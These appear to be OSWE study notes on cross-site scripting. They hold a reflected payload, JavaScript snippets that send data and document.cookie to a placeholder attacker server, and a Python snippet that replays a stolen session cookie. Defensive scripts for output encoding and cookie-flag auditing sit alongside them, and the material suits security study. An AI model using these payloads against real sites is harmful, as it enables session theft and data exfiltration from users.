AWAE - OSWE Preparation / Resources
XSS

Cross-Site Scripting (XSS)

Reflected

Vulnerable code

<?php
        echo '<div><p>Searched string: ' . $_GET['search'] . '</p></div>';
?>

The injection

http(s)://HOST/file.php?search=1

Response

<div><p>Searched string: 1</p></div>

http(s)://HOST/file.php?search=</p><script>alert()</script><p>

Response

<div><p>Searched string: </p><script>alert()</script><p></p></div>

As you can see, the injected code gets inserted into the HTML response of the website.

</p> -> Closing the current tag.
<script> -> Opening the JavaScript tag.
alert() -> Function to pop an alert box.
</script> -> Closing the JavaScript tag.
<p> -> Reopening the p tag so the rest of the response does not get messed up.
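The fix for the reflected case above is to encode the untrusted value for the HTML text context before it reaches the response. The following Python script is an added example, not code from the page or from OSWE material: it mirrors the page's PHP template as render_vulnerable(), puts the encoded version beside it as render_hardened() (html.escape is the Python counterpart of htmlspecialchars($s, ENT_QUOTES, 'UTF-8')), and then parses both outputs the way a browser would to check whether the page's payload produced a <script> element. The payload string and the helper names are constructed for the example.

```python
import html
from html.parser import HTMLParser
from typing import Callable, Dict

# Constructed inputs: the benign search term and the payload shown on the page.
BENIGN_SEARCH = "1"
XSS_PAYLOAD = "</p><script>alert()</script><p>"


def render_vulnerable(search: str) -> str:
    """Python mirror of the page's PHP: $_GET['search'] concatenated straight into HTML."""
    return "<div><p>Searched string: " + search + "</p></div>"


def render_hardened(search: str) -> str:
    """Same template, but the untrusted value is entity-encoded for an HTML text context.

    html.escape(s, quote=True) turns &, <, >, " and ' into entities, which is what
    PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8') does for the same template.
    The browser then renders the payload as literal text instead of parsing it as tags.
    """
    return "<div><p>Searched string: " + html.escape(search, quote=True) + "</p></div>"


class _StartTagCounter(HTMLParser):
    """Counts every start tag the HTML parser sees, keyed by tag name."""

    def __init__(self) -> None:
        super().__init__()
        self.counts: Dict[str, int] = {}

    def handle_starttag(self, tag: str, attrs) -> None:
        self.counts[tag] = self.counts.get(tag, 0) + 1


def count_elements(markup: str) -> Dict[str, int]:
    """Return {tag: occurrences} for the start tags found in `markup`."""
    parser = _StartTagCounter()
    parser.feed(markup)
    parser.close()
    return parser.counts


def reflects_script(render: Callable[[str], str], search: str) -> bool:
    """True when rendering `search` with `render` yields a <script> element,
    i.e. the reflected value broke out of the text context."""
    return count_elements(render(search)).get("script", 0) > 0


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(f"[{name}] benign : {render(BENIGN_SEARCH)}")
        print(f"[{name}] payload: {render(XSS_PAYLOAD)}")
        print(f"[{name}] script element present: {reflects_script(render, XSS_PAYLOAD)}")
```

Entity encoding is the right fix only because the value lands in an HTML text node; a value placed inside an attribute, a URL or a JavaScript string needs the encoding for that context instead, so the same check is worth rerunning for every place a parameter is reflected.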

Stored

In this injection, the code gets stored into a database (e.g. as a comment, name, description, etc) and then gets reflected when it is displayed.

Data exfiltration

To exfiltrate data, a receiving server is needed, such as an HTTP server.

Exfiltrating basic data

<html>
<script>

first = new XMLHttpRequest();
first.open("POST", "YOUR-SERVER");
first.send("EXFILTRATED-DATA");

</script>
</html>

Exfiltrating other endpoint's data

<html>
<script>

first = new XMLHttpRequest();
first.open("GET", "TARGET-SERVER");
first.onreadystatechange = function () {
        if (first.readyState === XMLHttpRequest.DONE) {
                second = new XMLHttpRequest();
                second.open("POST", "YOUR-SERVER");
                second.send("EXFILTRATED-DATA");
        }
}
first.send();

</script>
</html>

Session Hijacking

In a nutshell, stealing the (administrator|authenticated user) session cookie's value and using it.

Exfiltrating the cookie

<html>
<script>

first = new XMLHttpRequest();
first.open("POST", "YOUR-SERVER");
first.send(document.cookie);

</script>
</html>

Using the cookie

import requests

url = ""
exfiltrated_cookie = ""
cookies = {'PHPSESSID': f"{exfiltrated_cookie}"} # Example

r = requests.get(url, cookies=cookies)
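The defensive counterpart to the two snippets above is the set of attributes on the session cookie: without HttpOnly the browser hands the cookie to document.cookie, which is exactly what the exfiltration payload reads. The following Python script is an added example, not code from the page: it parses Set-Cookie headers and reports, per cookie, the attributes that matter for session hijacking. The sample headers, the cookie names and the helper names are constructed for the example.

```python
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed Set-Cookie headers (not captured from any real application).
SAMPLE_SET_COOKIE_HEADERS = [
    "PHPSESSID=abc123; Path=/",                                  # readable via document.cookie
    "PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax",  # hardened session cookie
    "theme=dark; Path=/; SameSite=Lax",                          # non-session preference cookie
]


@dataclass
class CookieSpec:
    name: str
    value: str
    # attribute name lower-cased -> value; flag attributes (HttpOnly, Secure) map to ""
    attrs: Dict[str, str] = field(default_factory=dict)


def parse_set_cookie(header: str) -> CookieSpec:
    """Split one Set-Cookie header into name, value and its attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    spec = CookieSpec(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        spec.attrs[key.strip().lower()] = val.strip()
    return spec


def exposed_to_document_cookie(spec: CookieSpec) -> bool:
    """Without HttpOnly the browser exposes the cookie to script, so the
    document.cookie exfiltration shown on the page would capture it."""
    return "httponly" not in spec.attrs


def audit_cookie(spec: CookieSpec) -> List[str]:
    """Return the weaknesses relevant to session hijacking for one cookie."""
    findings: List[str] = []
    if "httponly" not in spec.attrs:
        findings.append("missing HttpOnly: readable from document.cookie")
    if "secure" not in spec.attrs:
        findings.append("missing Secure: also sent over plaintext HTTP")
    if spec.attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: attached to cross-site requests")
    return findings


def audit_headers(headers: List[str]) -> Dict[str, List[str]]:
    """Audit several Set-Cookie headers; keys are the raw header strings."""
    return {h: audit_cookie(parse_set_cookie(h)) for h in headers}


if __name__ == "__main__":
    for header, findings in audit_headers(SAMPLE_SET_COOKIE_HEADERS).items():
        print(header)
        for finding in findings or ["no findings"]:
            print("   -", finding)
```

HttpOnly closes off the document.cookie read, but not the pattern in "Exfiltrating other endpoint's data": there the injected script never touches the cookie, the browser attaches it to the in-page request itself. So the cookie attributes limit the damage of one technique; the XSS itself is still fixed only by output encoding.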

Filter Bypass

OWASP XSS Filter Evasion Cheat Sheet: https://owasp.org/www-community/xss-filter-evasion-cheatsheet

Resources

NGROK's substitute for tunXs and python's SimpleHTTPServer/http.server
247ctf [Web]: TrustedClient (ITasahobby)

Last updated 4 years ago